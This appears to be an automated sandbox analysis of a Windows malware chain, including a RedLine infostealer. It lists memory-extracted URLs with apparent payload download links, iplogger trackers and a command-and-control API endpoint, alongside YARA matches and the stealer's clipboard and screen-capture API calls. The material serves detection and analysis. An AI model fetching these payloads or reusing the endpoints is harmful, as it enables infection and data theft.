Source: powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://crashpad.chromium.org/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://crashstats-collector.opera.com/collector/submit
Source: Traffic.exe, 0000000F.00000002.2321334601.000000000270D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2567701880.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2650906169.00000000033B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://economicscreateojsu.shop/
Source: RegAsm.exe, 00000015.00000002.2650906169.00000000033BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://economicscreateojsu.shop/api
Source: RegAsm.exe, 00000015.00000002.2650906169.00000000033BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://economicscreateojsu.shop/apip
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://economicscreateojsu.shop:443/api
Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://economicscreateojsu.shop:443/api)
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s
Source: svchost.exe, 00000013.00000003.2285131926.0000025E5364E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000013.00000003.2285131926.0000025E535F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://gamemaker.io
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://gamemaker.io)
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://gamemaker.io/en/education.
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://gamemaker.io/en/get.
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://help.instagram.com/581066165581870;
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://help.opera.com/latest/
Source: NewB.exe, 00000017.00000003.2353346772.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/
Source: NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/45c777cd634b90d85bd90992c72a11ec/4767d2e713f2021e8fe856e3ea638b58.exe
Source: NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/AV
Source: NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/IV
Source: NewB.exe, 00000017.00000003.2353346772.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/a638b58.exe
Source: NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/iV
Source: NewB.exe, 00000017.00000003.2332265607.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, NewB.exe, 00000017.00000003.2332141365.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://junglethomas.com/qV
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://legal.opera.com/eula/computers
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://legal.opera.com/privacy
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://legal.opera.com/privacy.
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://legal.opera.com/terms
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://legal.opera.com/terms.
Source: powershell.exe, 00000008.00000002.2542158333.000001A31C51F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://opera.com/privacy
Source: NewB.exe, 00000017.00000003.2332224399.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parrotflight.com/4767d2e713f2021e8fe856e3ea638b58.exe
Source: Uni400uni.exe, 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://policies.google.com/terms;
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://redir.opera.com/uninstallsurvey/
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://sourcecode.opera.com
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://telegram.org/tos/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://twitter.com/en/tos;
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://www.opera.com
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://www.opera.com..
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://www.opera.com/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://www.opera.com/download/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://www.opera.com/privacy
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://www.whatsapp.com/legal;
Source: file300un.exe, 00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su/RNWPd.exeChttps://pastebin.com/raw/E0rY26ni5https://iplogger.com/1lyxz

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 21_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

21_2_0042DDE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 21_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

21_2_0042DDE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_0042B190 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

29_2_0042B190

Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002821000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_7d0672c4-d

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File created: C:\Users\user\AppData\Local\Temp\TmpBCE6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp3775.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp3776.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	File created: C:\Users\user\AppData\Local\Temp\TmpBD35.tmp	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the System eventlog

Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe

Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.alexxxxxxxx.exe.3c762de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 10.2.alexxxxxxxx.exe.3c762de.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.alexxxxxxxx.exe.3b05570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 10.2.alexxxxxxxx.exe.3b05570.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown

.NET source code contains very large array initializations

Source: gold[1].exe.2.dr, RemoteObjects.cs	Large array initialization: RemoteObjects: array initializer size 307200
Source: gold.exe.2.dr, RemoteObjects.cs	Large array initialization: RemoteObjects: array initializer size 307200
Source: swiiiii[1].exe.2.dr, RemoteObjects.cs	Large array initialization: RemoteObjects: array initializer size 297472
Source: swiiiii.exe.2.dr, RemoteObjects.cs	Large array initialization: RemoteObjects: array initializer size 297472

PE file contains section with special chars

Source: bUWKfj04aU.exe	Static PE information: section name:
Source: bUWKfj04aU.exe	Static PE information: section name: .idata
Source: bUWKfj04aU.exe	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: .idata
Source: explorgu.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001ACC87 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	26_2_001ACC87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004371C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004371C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004381B0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004381B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004322C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,RtlAllocateHeap,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004322C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004372F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004372F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00415300 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00415300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00438470 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00438470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004344DB NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004344DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00437550 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00437550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004376C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004376C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004166A7 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004166A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004177E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004177E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00415B15 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00415B15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00419C00 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00419C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00423C16 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00423C16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00433CF7 NtOpenSection,	29_2_00433CF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00416C80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00416C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00434D0A NtMapViewOfSection,	29_2_00434D0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00436E10 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00436E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041EFD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_0041EFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00436FF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00436FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004180C5 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004180C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413145 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00413145
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00430450 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00430450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00437420 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00437420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00417670 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00417670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00432600 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00432600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004136F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004136F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041B6AF NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_0041B6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004328F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00421890 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004379E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_004379E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00432A50 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00432A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041BA3C NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_0041BA3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041DA90 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_0041DA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00432B60 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00432B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00418B31 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00418B31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041DBF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_0041DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00432C90 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00432C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00437D70 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00437D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00432DA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00432DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00419E30 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00419E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00416E36 NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00416E36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00423FF3 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	29_2_00423FF3

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	File created: C:\Windows\Tasks\explorgu.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_009024D0	0_2_009024D0
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_008C60E0	0_2_008C60E0
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00906809	0_2_00906809
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_0090707B	0_2_0090707B
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00902968	0_2_00902968
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00907EB0	0_2_00907EB0
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_008F7780	0_2_008F7780
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00906F5B	0_2_00906F5B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3448CCAB	8_2_00007FFD3448CCAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34489EE0	8_2_00007FFD34489EE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD344907A0	8_2_00007FFD344907A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3448C99D	8_2_00007FFD3448C99D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34492171	8_2_00007FFD34492171
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3448EADC	8_2_00007FFD3448EADC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3448EB21	8_2_00007FFD3448EB21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3448A3FA	8_2_00007FFD3448A3FA
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Code function: 10_2_00FC0C38	10_2_00FC0C38
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Code function: 10_2_00FC0C28	10_2_00FC0C28
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Code function: 10_2_00FC09B0	10_2_00FC09B0
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Code function: 10_2_00FC099F	10_2_00FC099F
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Code function: 17_2_00B70A2F	17_2_00B70A2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00425183	21_2_00425183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00421670	21_2_00421670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00415B57	21_2_00415B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00404C40	21_2_00404C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00421F80	21_2_00421F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00410060	21_2_00410060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00401000	21_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041D128	21_2_0041D128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B130	21_2_0043B130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00408250	21_2_00408250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00404260	21_2_00404260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00403370	21_2_00403370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B470	21_2_0043B470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00436480	21_2_00436480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00406610	21_2_00406610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004216CE	21_2_004216CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00401740	21_2_00401740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00403770	21_2_00403770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00405890	21_2_00405890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00406C20	21_2_00406C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0041DD72	21_2_0041DD72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00426E67	21_2_00426E67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00426F29	21_2_00426F29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00426FA0	21_2_00426FA0
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001D30F8	26_2_001D30F8
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001B6283	26_2_001B6283
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001D8640	26_2_001D8640
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001B16F3	26_2_001B16F3
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001D76EB	26_2_001D76EB
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001D780B	26_2_001D780B
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001D2C60	26_2_001D2C60
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001B3EE2	26_2_001B3EE2
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001C7F10	26_2_001C7F10
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001B0F04	26_2_001B0F04
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001D6F99	26_2_001D6F99
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Code function: 27_2_00D20E8F	27_2_00D20E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00404AB0	29_2_00404AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041EFD0	29_2_0041EFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0042404C	29_2_0042404C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00401000	29_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004040E0	29_2_004040E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004301F0	29_2_004301F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004051B0	29_2_004051B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00403350	29_2_00403350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040A300	29_2_0040A300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00411410	29_2_00411410
